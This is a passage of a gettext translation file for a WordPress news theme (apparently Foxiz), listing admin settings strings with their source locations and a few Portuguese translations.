"Disable Dashicons" msgstr "" #: backend/panels/optimized.php:81 msgid "Disable Default Fonts" msgstr "" #: backend/panels/optimized.php:51 msgid "Disable Gutenberg Style on Page Builder" msgstr "" #: backend/panels/login.php:126 backend/panels/login.php:153 msgid "Disable Language Bar" msgstr "" #: backend/panels/amp.php:188 backend/panels/amp.php:197 #: backend/panels/amp.php:206 backend/panels/amp.php:215 #: backend/panels/amp.php:224 backend/panels/amp.php:233 msgid "Disable on AMP" msgstr "" #: backend/panels/ads.php:59 msgid "Disable on Woocommerce Pages" msgstr "" #: backend/panels/blog-pages.php:83 msgid "Disable or select a category header style for the category pages." msgstr "" #: backend/category-settings.php:79 msgid "Disable or select a category header style for this category page." msgstr "" #: backend/category-settings.php:366 backend/panels/block-classic.php:59 #: backend/panels/block-grid.php:59 backend/panels/block-grid.php:224 #: backend/panels/block-grid.php:389 backend/panels/block-grid.php:562 #: backend/panels/block-grid.php:749 backend/panels/block-list.php:67 #: backend/panels/block-list.php:240 backend/panels/block-list.php:421 #: backend/panels/block-list.php:616 backend/panels/blog-pages.php:393 #: backend/panels/blog-pages.php:880 backend/panels/blog-pages.php:1294 #: backend/panels/blog-pages.php:1702 backend/panels/blog-pages.php:2194 #: backend/panels/bookmark.php:292 backend/panels/bookmark.php:740 msgid "Disable or select setting for entry review meta." msgstr "" #: backend/category-settings.php:382 backend/panels/block-classic.php:74 #: backend/panels/block-grid.php:74 backend/panels/block-grid.php:239 #: backend/panels/block-grid.php:404 backend/panels/block-grid.php:577 #: backend/panels/block-grid.php:764 backend/panels/block-list.php:82 #: backend/panels/block-list.php:255 backend/panels/block-list.php:436 #: backend/panels/block-list.php:631 backend/panels/blog-pages.php:409 #: backend/panels/blog-pages.php:896 backend/panels/blog-pages.php:1310 #: backend/panels/blog-pages.php:1718 backend/panels/blog-pages.php:2210 #: backend/panels/bookmark.php:308 backend/panels/bookmark.php:756 msgid "Disable or select setting for the post format." msgstr "" #: backend/panels/blog-pages.php:425 backend/panels/blog-pages.php:912 #: backend/panels/blog-pages.php:1326 backend/panels/blog-pages.php:1734 #: backend/panels/blog-pages.php:2226 backend/panels/bookmark.php:324 #: backend/panels/bookmark.php:772 msgid "Disable or select settings for the post excerpt." msgstr "" #: backend/panels/optimized.php:59 msgid "Disable Polyfill Script" msgstr "" #: backend/panels/design.php:673 msgid "Disable round corner style for whole the website." msgstr "" #: backend/panels/optimized.php:35 msgid "Disable Srcset" msgstr "" #: backend/panels/optimized.php:36 msgid "Disable Srcset to optimize page speed score on mobile device." msgstr "" #: backend/panels/amp.php:189 backend/panels/amp.php:198 msgid "Disable the Author Card in the AMP mode." msgstr "" #: backend/panels/optimized.php:52 msgid "Disable the block style css on the page built with Page Builder." msgstr "" #: backend/panels/login.php:127 backend/panels/login.php:154 msgid "Disable the language bar in the login screen." msgstr "" #: backend/panels/amp.php:207 msgid "Disable the Next/Prev Articles section in the AMP mode." msgstr "" #: backend/panels/amp.php:225 msgid "Disable the related section in the AMP mode." msgstr "" #: backend/panels/amp.php:234 msgid "Disable the single post sidebar section in the AMP mode." msgstr "" #: backend/single-metaboxes.php:143 msgid "Disable the top ad site for this page." msgstr "" #: backend/panels/optimized.php:60 msgid "" "Disable wp-polyfill script (supporting older browsers that do not understand " "ES6) to improve the page speed score." msgstr "" #: backend/panels/single-post.php:1371 msgid "Disabled" msgstr "" #: backend/single-metaboxes.php:568 msgid "disadvantage item" msgstr "" #: backend/single-metaboxes.php:560 msgid "Disadvantages" msgstr "" #: backend/class-tgm-plugin-activation.php:407 msgid "Dismiss this notice" msgstr "" #: backend/mega-menu.php:235 msgid "" "Display a icon before this menu item label. You can choose font icon or " "custom attachment image/SVG." msgstr "" #: backend/mega-menu.php:211 msgid "Display a sub label after this navigation label." msgstr "" #: backend/panels/design.php:185 msgid "Display Human Time (Ago)" msgstr "" #: backend/panels/newsletter.php:93 msgid "Display Mode" msgstr "" #: backend/single-metaboxes.php:745 msgid "" "Display page selected section when you use break pages for a lengthy content " "post." msgstr "" #: backend/panels/woocommerce.php:182 msgid "Display Percentage saved on WooCommerce sale products" msgstr "" #: backend/panels/single-post.php:1275 backend/panels/table-contents.php:141 #: backend/single-metaboxes.php:736 msgid "Display Position" msgstr "" #: backend/panels/ads.php:428 backend/panels/amp.php:588 msgid "Display Positions" msgstr "" #: backend/mega-menu.php:121 msgid "Display posts of this category." msgstr "" #: backend/panels/design.php:206 msgid "Display the edit post link for the logged users on the featured image." msgstr "" #: backend/panels/single-post.php:1738 msgid "Display the reading indicator bar at the top site." msgstr "" #: includes/sidebars.php:80 msgid "Display widget ad at the bottom of the website header." msgstr "" #: backend/panels/newsletter.php:104 msgid "Distance of Scroll" msgstr "" #: backend/panels/ads.php:134 backend/panels/ads.php:323 msgid "Do not Override" msgstr "" #: backend/panels/ads.php:45 msgid "Do not place more than one auto ads code in the website." msgstr "" #: templates/parts.php:630 msgid "Dribbble" msgstr "" #: backend/panels/socials.php:110 msgid "Dribbble URL" msgstr "" #: templates/parts.php:175 #, php-format msgid "Dynamic %s pagination" msgstr "" #: backend/panels/amp.php:181 msgid "" "Each AMP page has a 75,000 byte CSS limit, turn off unnecessary section will " "increase the AMP performance." msgstr "" #: backend/panels/amp.php:50 msgid "" "Each AMP page has a 75,000 byte CSS limit. Foxiz will support a compact " "footer to ensure your website will meet with this requirement." msgstr "" #: backend/panels/header.php:128 msgid "" "Each widget is added in \"Appearance >Widgets > More Menu Section\" will be " "corresponding to a column." msgstr "" #: templates/single/templates.php:970 msgid "Edit" msgstr "Editar" #: templates/entry.php:828 msgid "edit" msgstr "editar" #: backend/panels/design.php:205 msgid "Edit Link" msgstr "" #: templates/parts.php:120 msgid "Edit Page" msgstr "" #: backend/panels/design.php:200 backend/panels/design.php:337 msgid "Edit Post Link" msgstr "" #: backend/install-plugins.php:30 msgid "Elementor Website Builder" msgstr "" #: backend/panels/woocommerce.php:172 msgid "Elements Styling" msgstr "" #: backend/panels/optimized.php:195 backend/panels/single-post.php:804 #: backend/panels/single-post.php:943 backend/panels/single-post.php:1081 #: backend/panels/single-post.php:1705 msgid "Email" msgstr "" #: backend/panels/reaction.php:52 msgid "Embarrass" msgstr "" #: backend/category-settings.php:117 backend/category-settings.php:316 #: backend/configs.php:196 backend/configs.php:425 backend/mega-menu.php:131 #: backend/panels/blog-pages.php:325 backend/panels/blog-pages.php:812 #: backend/panels/blog-pages.php:1226 backend/panels/blog-pages.php:1634 #: backend/panels/blog-pages.php:2126 backend/panels/bookmark.php:228 #: backend/panels/bookmark.php:676 backend/panels/login.php:30 #: backend/panels/page.php:86 backend/panels/single-post.php:238 #: backend/panels/single-post.php:453 backend/panels/single-post.php:1179 #: backend/single-metaboxes.php:158 backend/single-metaboxes.php:361 #: backend/single-metaboxes.php:409 backend/single-metaboxes.php:477 #: backend/single-metaboxes.php:616 backend/single-metaboxes.php:654 #: backend/single-metaboxes.php:685 backend/single-metaboxes.php:696 #: backend/single-metaboxes.php:715 backend/single-metaboxes.php:825 #: backend/single-metaboxes.php:844 backend/single-metaboxes.php:863 #: backend/single-metaboxes.php:876 backend/single-metaboxes.php:935 msgid "Enable" msgstr "" #: backend/panels/single-post.php:1225 msgid "Enable for All Posts" msgstr "" #: backend/panels/single-post.php:1224 msgid "Enable for Review Posts" msgstr "" #: backend/panels/header.php:216 msgid "Enable live search result when typing." msgstr "" #: backend/single-metaboxes.php:821 msgid "" "Enable or disable ajax load next posts for this post. This setting will " "override on the global setting." msgstr "" #: backend/panels/single-post.php:1434 msgid "" "Enable or disable ajax load next posts when visitors reached end of the post " "content." msgstr "" #: backend/single-metaboxes.php:405 msgid "Enable or disable autoplay audio for this post." msgstr "" #: backend/panels/design.php:427 msgid "Enable or disable autoplay for the sliders." msgstr "" #: backend/single-metaboxes.php:357 msgid "Enable or disable autoplay video for this post." msgstr "" #: backend/panels/single-post.php:715 backend/panels/single-post.php:854 #: backend/panels/single-post.php:992 backend/panels/single-post.php:1613 msgid "Enable or disable color for social icons." msgstr "" #: backend/panels/single-post.php:480 msgid "Enable or disable entry category info in the single post." msgstr "" #: backend/panels/design.php:454 msgid "Enable or disable free mode when scrolling on the carousels." msgstr "" #: backend/panels/design.php:648 msgid "Enable or disable GIF supported for your website." msgstr "" #: backend/panels/table-contents.php:149 msgid "Enable or disable hierarchy for the table of contents box." msgstr "" #: backend/panels/design.php:492 msgid "Enable or disable icon for the audio post format." msgstr "" #: backend/panels/design.php:485 msgid "Enable or disable icon for the gallery post format." msgstr "" #: backend/panels/design.php:478 msgid "Enable or disable icon for the video post format." msgstr "" #: backend/panels/optimized.php:237 msgid "" "Enable or disable Open Graph (share to social). This option will be " "automatically disabled if you use Yoast SEO." msgstr "" #: backend/panels/optimized.php:75 msgid "Enable or disable preload font icons to increase the site speed score." msgstr "" #: backend/panels/optimized.php:68 msgid "" "Enable or disable preload Google fonts to increase the site speed score." msgstr "" #: backend/panels/single-post.php:276 msgid "" "Enable or disable quick view info bar (review & sponsor meta) at the top of " "the content." msgstr "" #: backend/single-metaboxes.php:871 msgid "" "Enable or disable review markup for this review. This option is useful in " "case you are using 3rd party markup plugin." msgstr "" #: backend/panels/optimized.php:161 msgid "" "Enable or disable review product markup for single post page if you want to " "use 3rd party plugin." msgstr "" #: backend/panels/optimized.php:122 msgid "" "Enable or disable schema markup for the website, helps generate brand " "signals. Disable this option if you want to use 3rd party plugin." msgstr "" #: backend/single-metaboxes.php:859 msgid "" "Enable or disable Schema markup for this article. Disable default schema " "markup for this post if you use a 3rd plugin to create another post type for " "example Recipe, Videos." msgstr "" #: backend/panels/header.php:238 msgid "Enable or disable search icon in the mobile header." msgstr "" #: backend/panels/header.php:245 msgid "Enable or disable search icon the AMP header." msgstr "" #: backend/panels/single-post.php:805 backend/panels/single-post.php:944 #: backend/panels/single-post.php:1082 backend/panels/single-post.php:1706 msgid "Enable or disable share on Email." msgstr "" #: backend/panels/single-post.php:724 backend/panels/single-post.php:863 #: backend/panels/single-post.php:1001 backend/panels/single-post.php:1508 #: backend/panels/single-post.php:1634 msgid "Enable or disable share on Facebook." msgstr "" #: backend/panels/single-post.php:760 backend/panels/single-post.php:899 #: backend/panels/single-post.php:1037 backend/panels/single-post.php:1666 msgid "Enable or disable share on LinkedIn." msgstr "" #: backend/panels/single-post.php:742 backend/panels/single-post.php:881 #: backend/panels/single-post.php:1019 backend/panels/single-post.php:1650 msgid "Enable or disable share on Pinterest." msgstr "" #: backend/panels/single-post.php:778 backend/panels/single-post.php:917 #: backend/panels/single-post.php:1055 backend/panels/single-post.php:1524 #: backend/panels/single-post.php:1682 msgid "Enable or disable share on Reddit." msgstr "" #: backend/panels/single-post.php:984 msgid "Enable or disable share on socials at the fixed left section." msgstr "" #: backend/panels/single-post.php:1605 msgid "Enable or disable share on socials list in this bar." msgstr "" #: backend/panels/single-post.php:796 backend/panels/single-post.php:935 #: backend/panels/single-post.php:1073 backend/panels/single-post.php:1698 msgid "Enable or disable share on Telegram." msgstr "" #: backend/panels/single-post.php:769 backend/panels/single-post.php:908 #: backend/panels/single-post.php:1046 backend/panels/single-post.php:1674 msgid "Enable or disable share on Tumblr." msgstr "" #: backend/panels/single-post.php:733 backend/panels/single-post.php:872 #: backend/panels/single-post.php:1010 backend/panels/single-post.php:1516 #: backend/panels/single-post.php:1642 msgid "Enable or disable share on Twitter." msgstr "" #: backend/panels/single-post.php:787 backend/panels/single-post.php:926 #: backend/panels/single-post.php:1064 backend/panels/single-post.php:1690 msgid "Enable or disable share on Vkontakte." msgstr "" #: backend/panels/single-post.php:751 backend/panels/single-post.php:890 #: backend/panels/single-post.php:1028 backend/panels/single-post.php:1658 msgid "Enable or disable share on WhatsApp." msgstr "" #: backend/panels/table-contents.php:164 msgid "Enable or disable smooth scroll effect to jumb to the anchor link." msgstr "" #: backend/single-metaboxes.php:612 msgid "Enable or disable sponsored content for this post." msgstr "" #: backend/panels/page.php:83 msgid "Enable or disable sticky sidebar feature for the single page." msgstr "" #: backend/panels/single-post.php:450 msgid "" "Enable or disable sticky sidebar feature. This option will only apply to the " "single post." msgstr "" #: backend/panels/blog-pages.php:1631 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the " "archive pages." msgstr "" #: backend/panels/blog-pages.php:1223 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the author " "pages." msgstr "" #: backend/panels/blog-pages.php:809 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the blog " "page." msgstr "" #: backend/panels/blog-pages.php:322 backend/panels/bookmark.php:225 #: backend/panels/bookmark.php:673 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the " "category pages." msgstr "" #: backend/panels/blog-pages.php:2123 backend/panels/blog-pages.php:2343 msgid "" "Enable or disable sticky sidebar feature. This setting applies to the search " "pages." msgstr "" #: backend/panels/single-post.php:1597 msgid "Enable or disable sticky the single post headline (post title)" msgstr "" #: backend/panels/block-classic.php:114 backend/panels/block-grid.php:114 #: backend/panels/block-grid.php:279 backend/panels/block-grid.php:444 #: backend/panels/block-grid.php:617 backend/panels/block-grid.php:804 #: backend/panels/block-list.php:122 backend/panels/block-list.php:295 #: backend/panels/block-list.php:476 backend/panels/block-list.php:671 msgid "Enable or disable the \"sponsored by\" meta." msgstr "" #: backend/panels/adblock.php:20 msgid "Enable or disable the adblock detector." msgstr "" #: backend/single-metaboxes.php:154 backend/single-metaboxes.php:931 msgid "Enable or disable the alert bar below the header." msgstr "" #: backend/panels/header.php:652 msgid "" "Enable or disable the alert bar below the header. This option will be " "overridden by the setting in individual post/page." msgstr "" #: backend/panels/single-post.php:577 msgid "Enable or disable the author avatars before the entry meta bar." msgstr "" #: backend/panels/blog-pages.php:1078 msgid "Enable or disable the author bio in the author pages." msgstr "" #: backend/panels/single-post.php:384 msgid "Enable or disable the author information in the bottom of the content." msgstr "" #: backend/panels/single-post.php:601 msgid "Enable or disable the author job info." msgstr "" #: backend/panels/amp.php:152 backend/panels/general.php:26 msgid "Enable or disable the back to top button." msgstr "" #: backend/panels/bookmark.php:38 msgid "" "Enable or disable the bookmark feature. This is global option and will apply " "to whole the website." msgstr "" #: backend/category-settings.php:390 backend/panels/block-classic.php:82 #: backend/panels/block-grid.php:82 backend/panels/block-grid.php:247 #: backend/panels/block-grid.php:412 backend/panels/block-grid.php:585 #: backend/panels/block-grid.php:772 backend/panels/block-list.php:90 #: backend/panels/block-list.php:263 backend/panels/block-list.php:444 #: backend/panels/block-list.php:639 backend/panels/blog-pages.php:417 #: backend/panels/blog-pages.php:904 backend/panels/blog-pages.php:1318 #: backend/panels/blog-pages.php:1726 backend/panels/blog-pages.php:2218 #: backend/panels/bookmark.php:316 backend/panels/bookmark.php:764 msgid "Enable or disable the bookmark icon." msgstr "" #: backend/single-metaboxes.php:693 msgid "Enable or disable the bottom entry widgets for this post." msgstr "" #: backend/panels/single-post.php:846 msgid "" "Enable or disable the bottom share bar, This section is displayed at below " "of the post content." msgstr "" #: backend/panels/breadcrumb.php:31 msgid "Enable or disable the breadcrumb bar for your website." msgstr "" #: backend/panels/breadcrumb.php:62 msgid "Enable or disable the breadcrumb bar in the single page." msgstr "" #: backend/panels/breadcrumb.php:51 msgid "Enable or disable the breadcrumb bar in the single post." msgstr "" #: backend/panels/breadcrumb.php:95 msgid "Enable or disable the breadcrumb in the archive pages." msgstr "" #: backend/panels/breadcrumb.php:84 msgid "Enable or disable the breadcrumb in the author pages." msgstr "" #: backend/panels/breadcrumb.php:73 msgid "Enable or disable the breadcrumb in the category pages." msgstr "" #: backend/category-settings.php:101 msgid "Enable or disable the breadcrumb in this category header." msgstr "" #: backend/panels/single-post.php:1213 msgid "" "Enable or disable the button show/hide comment box in the single post pages." msgstr "" #: backend/panels/single-post.php:1474 msgid "" "Enable or disable the button show/hide comment box when load next posts." msgstr "" #: backend/panels/single-post.php:953 msgid "Enable or disable the copy post link button." msgstr "" #: backend/panels/single-post.php:814 backend/panels/single-post.php:1091 msgid "Enable or disable the copy post link icon." msgstr "" #: backend/panels/dark-mode.php:29 msgid "Enable or disable the dark mode whole your website." msgstr "" #: backend/panels/optimized.php:153 msgid "" "Enable or disable the default schema markup for single post page if you want " "to use 3rd party plugin." msgstr "" #: backend/panels/amp.php:131 msgid "Enable or disable the footer copyright section." msgstr "" #: backend/panels/ads.php:463 msgid "Enable or disable the footer slide up section." msgstr "" #: backend/panels/single-post.php:1500 msgid "Enable or disable the highlight shares feature." msgstr "" #: backend/panels/design.php:186 msgid "" "Enable or disable the human time format (\"ago\") for the data post entry " "meta." msgstr "" #: backend/panels/single-post.php:639 msgid "Enable or disable the last updated meta info in the single post." msgstr "" #: backend/panels/optimized.php:28 msgid "Enable or disable the lazy load for the featured image." msgstr "" #: backend/category-settings.php:374 backend/panels/block-classic.php:67 #: backend/panels/block-grid.php:67 backend/panels/block-grid.php:232 #: backend/panels/block-grid.php:397 backend/panels/block-grid.php:570 #: backend/panels/block-grid.php:757 backend/panels/block-list.php:75 #: backend/panels/block-list.php:248 backend/panels/block-list.php:429 #: backend/panels/block-list.php:624 backend/panels/blog-pages.php:401 #: backend/panels/blog-pages.php:888 backend/panels/blog-pages.php:1302 #: backend/panels/blog-pages.php:1710 backend/panels/blog-pages.php:2202 #: backend/panels/bookmark.php:300 backend/panels/bookmark.php:748 msgid "Enable or disable the meta description at the end of the review bar." msgstr "" #: backend/panels/header-style.php:30 backend/panels/header-style.php:324 #: backend/panels/header-style.php:575 msgid "Enable or disable the more button at the end of the navigation." msgstr "" #: backend/panels/single-post.php:334 msgid "Enable or disable the newsletter form at bottom entry content." msgstr "" #: backend/panels/single-post.php:393 msgid "" "Enable or disable the next/previous link navigation in single post pages." msgstr "" #: backend/panels/header.php:270 msgid "Enable or disable the notification section on the header." msgstr "" #: backend/panels/table-contents.php:157 msgid "Enable or disable the number list items." msgstr "" #: backend/panels/single-post.php:1395 msgid "Enable or disable the popular section in single post pages." msgstr "" #: backend/panels/newsletter.php:28 msgid "Enable or disable the popup newsletter form." msgstr "" #: backend/panels/bookmark.php:45 msgid "" "Enable or disable the popup notification when users add or remove a post." msgstr "" #: backend/panels/single-post.php:297 msgid "Enable or disable the post tags bar at the bottom of the post content." msgstr "" #: backend/panels/single-post.php:962 backend/panels/single-post.php:1100 #: backend/panels/single-post.php:1714 msgid "Enable or disable the print button." msgstr "" #: backend/panels/single-post.php:823 msgid "Enable or disable the print post button." msgstr "" #: backend/panels/privacy.php:15 msgid "Enable or disable the privacy bar." msgstr "" #: backend/panels/reaction.php:24 msgid "Enable or disable the reaction section at the end of single post pages." msgstr "" #: backend/single-metaboxes.php:840 msgid "Enable or disable the reaction section at the end of this post." msgstr "" #: backend/category-settings.php:426 backend/panels/block-classic.php:107 #: backend/panels/block-grid.php:107 backend/panels/block-grid.php:272 #: backend/panels/block-grid.php:437 backend/panels/block-grid.php:610 #: backend/panels/block-grid.php:797 backend/panels/block-list.php:115 #: backend/panels/block-list.php:288 backend/panels/block-list.php:469 #: backend/panels/block-list.php:664 backend/panels/blog-pages.php:454 #: backend/panels/blog-pages.php:941 backend/panels/blog-pages.php:1355 #: backend/panels/blog-pages.php:1763 backend/panels/blog-pages.php:2255 #: backend/panels/bookmark.php:353 backend/panels/bookmark.php:801 msgid "Enable or disable the read more button." msgstr "" #: backend/panels/single-post.php:1746 msgid "Enable or disable the reading indicator bar." msgstr "" #: backend/panels/single-post.php:668 msgid "Enable or disable the reading time info in the single post." msgstr "" #: backend/panels/single-post.php:1297 msgid "" "Enable or disable the related section at the footer in single post pages." msgstr "" #: backend/panels/woocommerce.php:138 msgid "enable or disable the review box in the single product page." msgstr "" #: backend/single-metaboxes.php:472 msgid "Enable or disable the review feature for this post." msgstr "" #: backend/panels/blog-pages.php:2419 msgid "Enable or disable the search form." msgstr "" #: backend/panels/header.php:196 msgid "Enable or disable the search icon in the header." msgstr "" #: backend/panels/header.php:533 msgid "Enable or disable the sign in button on the header." msgstr "" #: backend/panels/header.php:541 msgid "Enable or disable the sign in button on the mobile header." msgstr "" #: backend/panels/header-style.php:37 backend/panels/header-style.php:331 #: backend/panels/header-style.php:582 msgid "Enable or disable the social icons list at the end of the navigation." msgstr "" #: backend/panels/amp.php:104 backend/panels/footer.php:165 msgid "Enable or disable the social list in this section." msgstr "" #: backend/panels/header.php:374 msgid "Enable or disable the socials list." msgstr "" #: backend/panels/single-post.php:305 msgid "Enable or disable the sources bar at the bottom of the post content." msgstr "" #: backend/panels/header.php:83 msgid "Enable or disable the sticky feature for the main menu bar." msgstr "" #: backend/panels/blog-pages.php:99 msgid "Enable or disable the sub category list in the category header." msgstr "" #: backend/category-settings.php:113 msgid "Enable or disable the sub category list in this category header." msgstr "" #: backend/single-metaboxes.php:711 msgid "Enable or disable the table content for this post." msgstr "" #: backend/panels/table-contents.php:30 msgid "Enable or disable the table of content for the single post." msgstr "" #: backend/panels/table-contents.php:37 msgid "Enable or disable the table of content for the single." msgstr "" #: backend/single-metaboxes.php:920 msgid "Enable or disable the top ad site for this post." msgstr "" #: backend/single-metaboxes.php:682 msgid "Enable or disable the top entry widgets for this post." msgstr "" #: backend/panels/single-post.php:313 msgid "Enable or disable the via bar at the bottom of the post content." msgstr "" #: backend/panels/design.php:363 backend/panels/design.php:371 #: backend/panels/design.php:379 backend/panels/design.php:387 #: backend/panels/design.php:395 msgid "Enable or disable this image crop size." msgstr "" #: backend/panels/general.php:18 msgid "Enable or disable tooltips when hovering on icons." msgstr "" #: backend/panels/single-post.php:707 msgid "" "Enable or disable top share section. This section will display below the " "single entry meta info." msgstr "" #: backend/panels/single-post.php:1220 msgid "" "Enable or disable visitors can rate and review all posts in the comment box." msgstr "" #: backend/panels/single-post.php:1176 msgid "Enable or disable visitors can rate and review on the post review." msgstr "" #: backend/single-metaboxes.php:484 msgid "" "Enable or disable visitors can rate and review this post in the comment box." msgstr "" #: backend/panels/optimized.php:130 msgid "" "Enable or disable website markup, helps to show the Search Box feature for " "brand SERPs and can help your website name to appear in search results." msgstr "" #: backend/panels/sidebar.php:56 msgid "Enable or disable widget block editor (WordPress 5.8 or above)." msgstr "" #: backend/panels/login.php:26 msgid "Enable or disable wp-login.php page style." msgstr "" #: backend/panels/optimized.php:145 msgid "Enable the Carousels (Item List) schema markup for your Homepage." msgstr "" #: backend/panels/optimized.php:83 msgid "Enable this option if all fonts in Typography panels is set." msgstr "" #: backend/panels/single-post.php:489 msgid "" "Enable this option if you would like to only show the primary category in " "the single post." msgstr "" #: backend/panels/bookmark.php:51 backend/panels/table-contents.php:125 msgid "Enable When" msgstr "" #: backend/single-metaboxes.php:489 msgid "Enable with Review" msgstr "" #: backend/panels/single-post.php:1180 msgid "Enable without Post Review" msgstr "" #: backend/panels/header.php:205 msgid "" "Ensure the option \"More Menu - Search Form\" is enabled when you select the " "\"More Menu Triggered\" option." msgstr "" #: backend/panels/header.php:286 msgid "" "Ensure this section set to Light Text if you select a dark sub-menu " "background." msgstr "" #: backend/panels/header.php:327 msgid "" "Ensure you have also set \"Dark Mode Colors\" if you use custom colors for " "the default mode." msgstr "" #: backend/panels/block-classic.php:39 backend/panels/block-grid.php:39 #: backend/panels/block-grid.php:204 backend/panels/block-grid.php:369 #: backend/panels/block-grid.php:542 backend/panels/block-grid.php:729 #: backend/panels/block-list.php:47 backend/panels/block-list.php:220 #: backend/panels/block-list.php:401 backend/panels/block-list.php:596 #: backend/panels/blog-pages.php:364 backend/panels/blog-pages.php:851 #: backend/panels/blog-pages.php:1265 backend/panels/blog-pages.php:1673 #: backend/panels/blog-pages.php:2165 backend/panels/bookmark.php:264 #: backend/panels/bookmark.php:712 backend/panels/design.php:31 #: backend/panels/single-post.php:470 backend/panels/single-post.php:479 #: backend/panels/typography.php:415 msgid "Entry Category" msgstr "" #: backend/category-settings.php:25 msgid "Entry Category Colors" msgstr "" #: backend/panels/typography.php:423 msgid "Entry Category Font" msgstr "" #: backend/panels/single-post.php:497 msgid "Entry Category Font Size" msgstr "" #: backend/panels/typography.php:75 msgid "Entry Excerpt" msgstr "" #: backend/panels/design.php:89 backend/panels/single-post.php:560 #: backend/panels/typography.php:464 msgid "Entry Meta" msgstr "" #: backend/category-settings.php:345 backend/panels/blog-pages.php:374 #: backend/panels/blog-pages.php:861 backend/panels/blog-pages.php:1275 #: backend/panels/blog-pages.php:1683 backend/panels/blog-pages.php:2175 #: backend/panels/bookmark.php:273 backend/panels/bookmark.php:721 msgid "Entry Meta Bar" msgstr "" #: backend/panels/typography.php:472 msgid "Entry Meta Font" msgstr "" #: backend/panels/design.php:98 msgid "Entry Meta Icons" msgstr "" #: backend/panels/single-post.php:570 msgid "Entry Meta Settings" msgstr "" #: backend/category-settings.php:358 backend/panels/block-classic.php:49 #: backend/panels/block-grid.php:49 backend/panels/block-grid.php:214 #: backend/panels/block-grid.php:379 backend/panels/block-grid.php:552 #: backend/panels/block-grid.php:739 backend/panels/block-list.php:57 #: backend/panels/block-list.php:230 backend/panels/block-list.php:411 #: backend/panels/block-list.php:606 backend/panels/blog-pages.php:383 #: backend/panels/blog-pages.php:870 backend/panels/blog-pages.php:1284 #: backend/panels/blog-pages.php:1692 backend/panels/blog-pages.php:2184 #: backend/panels/bookmark.php:282 backend/panels/bookmark.php:730 #: backend/panels/single-post.php:585 msgid "Entry Meta Tags" msgstr "" #: backend/single-metaboxes.php:676 msgid "Entry Widgets" msgstr "" #: backend/category-settings.php:397 backend/panels/blog-pages.php:424 #: backend/panels/blog-pages.php:911 backend/panels/blog-pages.php:1325 #: backend/panels/blog-pages.php:1733 backend/panels/blog-pages.php:2225 #: backend/panels/bookmark.php:323 backend/panels/bookmark.php:771 msgid "Excerpt" msgstr "" #: backend/category-settings.php:408 backend/panels/block-classic.php:90 #: backend/panels/block-grid.php:90 backend/panels/block-grid.php:255 #: backend/panels/block-grid.php:420 backend/panels/block-grid.php:593 #: backend/panels/block-grid.php:780 backend/panels/block-list.php:98 #: backend/panels/block-list.php:271 backend/panels/block-list.php:452 #: backend/panels/block-list.php:647 backend/panels/blog-pages.php:434 #: backend/panels/blog-pages.php:921 backend/panels/blog-pages.php:1335 #: backend/panels/blog-pages.php:1743 backend/panels/blog-pages.php:2235 #: backend/panels/bookmark.php:333 backend/panels/bookmark.php:781 msgid "Excerpt - Max Length" msgstr "" #: backend/category-settings.php:416 backend/panels/block-classic.php:97 #: backend/panels/block-grid.php:97 backend/panels/block-grid.php:262 #: backend/panels/block-grid.php:427 backend/panels/block-grid.php:600 #: backend/panels/block-grid.php:787 backend/panels/block-list.php:105 #: backend/panels/block-list.php:278 backend/panels/block-list.php:459 #: backend/panels/block-list.php:654 backend/panels/blog-pages.php:442 #: backend/panels/blog-pages.php:929 backend/panels/blog-pages.php:1343 #: backend/panels/blog-pages.php:1751 backend/panels/blog-pages.php:2243 #: backend/panels/bookmark.php:341 backend/panels/bookmark.php:789 msgid "Excerpt - Source" msgstr "" #: backend/panels/color.php:123 msgid "Excerpt Color" msgstr "" #: backend/category-settings.php:219 msgid "" "Exclude tag slugs for the latest blog. Separated by commas (for example: " "tagslug1,tagslug2,tagslug3)." msgstr "" #: backend/category-settings.php:218 msgid "Exclude Tags Slug" msgstr "" #: backend/class-tgm-plugin-activation.php:2389 msgid "External Source" msgstr "" #: backend/panels/single-post.php:723 backend/panels/single-post.php:862 #: backend/panels/single-post.php:1000 backend/panels/single-post.php:1633 #: templates/parts.php:591 msgid "Facebook" msgstr "" #: backend/panels/optimized.php:244 msgid "Facebook APP ID" msgstr "" #: backend/panels/optimized.php:253 msgid "Facebook Default Image" msgstr "" #: backend/panels/socials.php:28 msgid "Facebook URL" msgstr "" #: backend/panels/design.php:446 msgid "Fade" msgstr "" #: backend/single-metaboxes.php:667 msgid "Fake View Value" msgstr "" #: backend/panels/design.php:265 msgid "Fallback Meta" msgstr "" #: backend/single-metaboxes.php:251 msgid "Featured Caption" msgstr "" #: backend/single-metaboxes.php:243 msgid "Featured Crop Size" msgstr "" #: backend/panels/design.php:639 msgid "Featured GIF" msgstr "" #: backend/panels/design.php:294 backend/single-metaboxes.php:238 msgid "Featured Image" msgstr "" #: backend/category-settings.php:328 backend/panels/block-classic.php:31 #: backend/panels/block-grid.php:31 backend/panels/block-grid.php:196 #: backend/panels/block-grid.php:361 backend/panels/block-grid.php:534 #: backend/panels/block-grid.php:721 backend/panels/block-list.php:31 #: backend/panels/block-list.php:204 backend/panels/block-list.php:385 #: backend/panels/block-list.php:580 backend/panels/blog-pages.php:349 #: backend/panels/blog-pages.php:836 backend/panels/blog-pages.php:1250 #: backend/panels/blog-pages.php:1658 backend/panels/blog-pages.php:2150 #: backend/panels/bookmark.php:249 backend/panels/bookmark.php:697 msgid "Featured Image Size" msgstr "" #: backend/category-settings.php:86 msgid "Featured Images" msgstr "" #: backend/panels/block-list.php:39 backend/panels/block-list.php:212 #: backend/panels/block-list.php:393 backend/panels/block-list.php:588 msgid "Featured Position" msgstr "" #: backend/single-metaboxes.php:574 msgid "Final Summary" msgstr "" #: templates/blog.php:94 msgid "Find More:" msgstr "Encontrar mais" #: backend/panels/privacy.php:26 msgid "Fixed Bottom" msgstr "" #: backend/panels/amp.php:332 backend/panels/amp.php:392 #: backend/panels/amp.php:452 backend/panels/amp.php:513 #: backend/panels/amp.php:573 msgid "Fixed Height (90px)" msgstr "" #: backend/panels/privacy.php:24 msgid "Fixed Left" msgstr "" #: backend/panels/single-post.php:975 msgid "Fixed Left Area" msgstr "" #: backend/panels/amp.php:186 backend/panels/single-post.php:983 msgid "Fixed Left Share Bar" msgstr "" #: templates/parts.php:612 msgid "Flickr" msgstr "" #: backend/panels/socials.php:74 msgid "Flickr URL" msgstr "" #: backend/panels/ads.php:421 msgid "Float Left" msgstr "" #: backend/panels/ads.php:422 msgid 